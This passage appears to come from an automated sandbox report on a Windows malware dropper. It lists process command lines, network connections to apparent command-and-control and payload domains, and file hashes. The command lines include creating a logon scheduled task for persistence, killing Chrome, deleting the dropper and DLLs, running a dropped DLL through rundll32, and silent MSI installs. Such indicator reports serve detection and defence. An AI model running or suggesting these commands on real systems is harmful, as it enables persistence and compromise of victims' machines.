"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3nf3vuq3.xiv\GcleanerEU.exe /eufive & exit

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vvkzhbjj.g42\installer.exe /qn CAMPAIGN="654" & exit

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nx1j32a0.rz0\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\3nf3vuq3.xiv\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\3nf3vuq3.xiv\GcleanerEU.exe /eufive

C:\Users\Admin\AppData\Local\Temp\vvkzhbjj.g42\installer.exe

C:\Users\Admin\AppData\Local\Temp\vvkzhbjj.g42\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecyxueza.kqj\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\nx1j32a0.rz0\anyname.exe

C:\Users\Admin\AppData\Local\Temp\nx1j32a0.rz0\anyname.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0a3gbael.due\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\ecyxueza.kqj\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\ecyxueza.kqj\gcleaner.exe /mixfive

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 40D9101A3E6C97D234B6387C0CB8BDBE C

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vvkzhbjj.g42\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vvkzhbjj.g42\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133662 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 04C1C99C2EE2A4AE65ED5F1A230267E0

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 26980AB318B41814BEAE4F2CEBC11DC2 E Global\MSI0000

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0 /state0:0xa3ae4855 /state1:0x41c64e6d

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 4B4F1FF58E30AFA2F74BF5492CA360FE E Global\MSI0000

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 896

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding DF8D3EFA40CEAA8E7C836A0C3B1D621F E Global\MSI0000

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding EAB07E299D2A5CDDA4AED98D60F78F7B E Global\MSI0000

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 52F9BE642833D7261834B363E958ABB7 E Global\MSI0000

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C736C391DA3F7E882E2E489F420F9838

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 www.listincode.com udp
US 144.202.76.47:443 www.listincode.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 a.goatgame.co udp
US 104.21.79.144:443 a.goatgame.co tcp
US 8.8.8.8:53 startupmart.bar udp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 qwertys.info udp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 104.21.37.182:443 startupmart.bar tcp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 liveme31.com udp
US 104.21.13.27:80 liveme31.com tcp
DE 88.99.66.31:443 iplogger.com tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
DE 88.99.66.31:443 iplogger.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 real-web-online.bar udp
US 172.67.159.99:443 real-web-online.bar tcp
US 8.8.8.8:53 phonefix.bar udp
US 104.21.10.67:443 phonefix.bar tcp
SC 185.215.113.104:18754 tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 live.goatgame.live udp
US 172.67.222.125:443 live.goatgame.live tcp
US 104.21.10.67:443 phonefix.bar tcp
RU 45.9.20.20:13441 tcp
US 172.67.146.70:443 a.goatgame.co tcp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 google.vrthcobj.com udp
US 8.8.8.8:53 google.vrthcobj.com udp
JP 34.97.69.225:53 google.vrthcobj.com udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 requestimmersive.com udp
US 162.0.220.187:80 requestimmersive.com tcp
N/A 127.0.0.1:49717 tcp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 google.com udp
N/A 127.0.0.1:49720 tcp
NL 142.250.179.132:80 www.google.com tcp
US 8.8.8.8:53 connectini.net udp
US 162.0.210.44:443 connectini.net tcp
US 162.0.210.44:443 connectini.net tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
US 162.0.220.187:80 requestimmersive.com tcp
US 162.0.210.44:443 connectini.net tcp
UA 194.145.227.159:80 194.145.227.159 tcp
US 8.8.8.8:53 source3.boys4dayz.com udp
US 172.67.148.61:443 source3.boys4dayz.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 aa.goatgamea.com udp
US 104.21.62.66:443 aa.goatgamea.com tcp
US 8.8.8.8:53 bb.goatgamed.com udp
US 104.21.30.211:443 bb.goatgamed.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 fsstoragecloudservice.com udp
BG 111.90.156.46:80 fsstoragecloudservice.com tcp
US 8.8.8.8:53 a.upstloans.net udp
US 104.21.31.210:443 a.upstloans.net tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 www.profitabletrustednetwork.com udp
US 8.8.8.8:53 a.goatgame.co udp
US 172.67.146.70:443 a.goatgame.co tcp
US 8.8.8.8:53 b.upstloans.net udp
US 104.21.31.210:443 b.upstloans.net tcp
US 104.21.31.210:443 b.upstloans.net tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 104.21.31.210:443 b.upstloans.net tcp
US 8.8.8.8:53 cleaner-partners.biz udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 venetrigni.com udp
US 52.45.132.150:443 venetrigni.com tcp
US 52.45.132.150:443 venetrigni.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 192.243.59.13:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 go.rolltrafficroll.com udp
US 8.8.8.8:53 htagzdownload.pw udp
RU 46.8.29.181:80 cleaner-partners.biz tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 go.rolltrafficroll.com udp
NL 212.32.252.129:443 go.rolltrafficroll.com tcp
US 8.8.8.8:53 varmisende.com udp
PK 124.109.61.160:80 varmisende.com tcp
US 8.8.8.8:53 google.vrthcobj.com udp
JP 34.97.69.225:53 google.vrthcobj.com udp
JP 34.97.69.225:53 google.vrthcobj.com udp
US 208.95.112.1:80 ip-api.com tcp
US 104.21.31.210:443 b.upstloans.net tcp

Files

memory/4576-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

memory/4640-118-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS0E1E8804\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/4640-131-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4640-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4640-133-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4804-134-0x0000000000000000-mapping.dmp

memory/4816-135-0x0000000000000000-mapping.dmp

memory/4832-137-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe

MD5 3a9115aa34ddc3302fe3d07ceddd4373
SHA1 10e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256 080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA512 85fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a

memory/4908-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe

MD5 6f4e3451cd8c385c87fd76feab15bb6e
SHA1 861c46d7211a572b756df462eec43c58aeec85f4
SHA256 21103f8445399fb1b3a5fe665cfd221d38066b09fa1e2a2d2ca59c09db95052a
SHA512 d5cd2e08dd7edd58702ddc17bf68fa721e7c00b00b5f136b7134c4e38820cbca329cdff96fcb616879845689e279c725329b7de23a2fb833ed5808f3b819132e

memory/4932-147-0x0000000000000000-mapping.dmp

memory/4952-149-0x0000000000000000-mapping.dmp

memory/4984-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

memory/5016-154-0x0000000000000000-mapping.dmp

memory/5068-158-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe

MD5 b904fb528fafefae5c59553a8c31291d
SHA1 0dc01712e88d5bb47cc8fb02678eb46466cc2442
SHA256 717b0790a5cc5b577fb2535effc00fb58a3d62e55537a3d3ae0bf6639e8c9474
SHA512 5a795d4bde04e489e688899937708bd6910d2a36d2b50397fca91590bb6e74921102cf1e4a52405488c6c4aeba92565794470007d6bb1e2f029d17d2095fa1ac

memory/5092-161-0x0000000000000000-mapping.dmp

memory/3856-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

memory/4640-176-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4124-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe

MD5 23474a72ab57624617ef5e251e99e4fe
SHA1 59a064a4ccaca8c5cdfd09fe078a7ad2cd9bc6db
SHA256 1ffe2a570e92529fa0944f786b82e3e75fec9c1633578e08cbe0a4c7e337e4f2
SHA512 cf869701e81688ee57f321280adf8bba27766797e298332cf2becbb1d2453ab96900d56bb6a831cb531b95dddd34b59133a880c399cc78488ae8c196738ffd33

memory/5016-182-0x0000000000970000-0x0000000000971000-memory.dmp

memory/4640-183-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4640-184-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3184-185-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4640-181-0x0000000064940000-0x0000000064959000-memory.dmp

memory/5092-179-0x0000000000C00000-0x0000000000C02000-memory.dmp

memory/4196-186-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-SF020.tmp\Sat19ba05e89ea6d406.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

memory/4968-189-0x0000000004740000-0x0000000004741000-memory.dmp

memory/4968-190-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

memory/5016-188-0x0000000000AA0000-0x0000000000ABB000-memory.dmp

memory/5016-170-0x0000000000260000-0x0000000000261000-memory.dmp

memory/5092-169-0x0000000000430000-0x0000000000431000-memory.dmp

memory/5016-191-0x0000000000980000-0x0000000000981000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
SHA256 fac205247d3b19b5f82f5f4d1269a5c047b6c9ad9f21cc51b4b782c2b08a3b87
SHA512 9578fc34807be2541aa7dc26acbe27211e96b42c6c4208afe195b19b08264dfeb3ea7fec637c759f062cbd5561c5140ecd68cd5c79efbb844d3b2639e336ca0c

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe

MD5 a1c7ed2563212e0aba70af8a654962fd
SHA1 987e944110921327adaba51d557dbf20dee886d5
SHA256 a15773680b31415eeebf20246f283857bda7e7dda16f4674c2cbeba2106e3592
SHA512 60d827b6d36d6f3a1b4af445b25f26812043d2be8934c338d29b8a1bbe0b50d8a7c06f54ea14afa1d9dbbc6340c649dc51b0ae12d77329e1fb6fdf99e896a462

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe

MD5 6f4e3451cd8c385c87fd76feab15bb6e
SHA1 861c46d7211a572b756df462eec43c58aeec85f4
SHA256 21103f8445399fb1b3a5fe665cfd221d38066b09fa1e2a2d2ca59c09db95052a
SHA512 d5cd2e08dd7edd58702ddc17bf68fa721e7c00b00b5f136b7134c4e38820cbca329cdff96fcb616879845689e279c725329b7de23a2fb833ed5808f3b819132e

memory/3184-164-0x0000000000000000-mapping.dmp

memory/3172-163-0x0000000000000000-mapping.dmp

memory/4968-192-0x00000000043D0000-0x00000000043D1000-memory.dmp

memory/4968-193-0x00000000043D2000-0x00000000043D3000-memory.dmp

memory/4196-195-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/5016-194-0x000000001AEC0000-0x000000001AEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe

MD5 f1e2bb0a62bf371a71b62224b18a69b8
SHA1 872738f6cac0e95a4a0625f9d6b6788cf0dbdfa2
SHA256 aec3efab3db88776950250c0bdc2a3be0e8fdb9c07fbcef83549bfa3bedc34ab
SHA512 ce257f0686c9552759f3d06d8218ac4c5c16350fb673843f06d188aeb8bb531fcf7f29a61c60ef52944e6f72ccfe91adff993c791959585c2fe7f1a1c1fe88f6

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe

MD5 3a9115aa34ddc3302fe3d07ceddd4373
SHA1 10e7f2a8c421c825a2467d488b33de09c2c2a14b
SHA256 080060800d33d4fa01099647797195995af436cbad0a5dc903a572b184b50634
SHA512 85fa6eddbaec2df843d623ddf88154cd2b62b9823c953b5659dc0464e1a47b90a877ca3681007561d2e1ccdd315e4f79ecf0285404868cc7cedd369ae28a586a

\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

memory/5048-156-0x0000000000000000-mapping.dmp

memory/5036-155-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
SHA512 bf0a41ef79e32da0ecfcc71807f7d39be4e03751fa7b5ac4cbd3ea43483664a28329de2df68a0b040c2debd3888fe2fcaa5e732ab68a0fbb1e4648b3ddc008be

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe

MD5 b160ce13f27f1e016b7bfc7a015f686b
SHA1 bfb714891d12ffd43875e72908d8b9f4f576ad6e
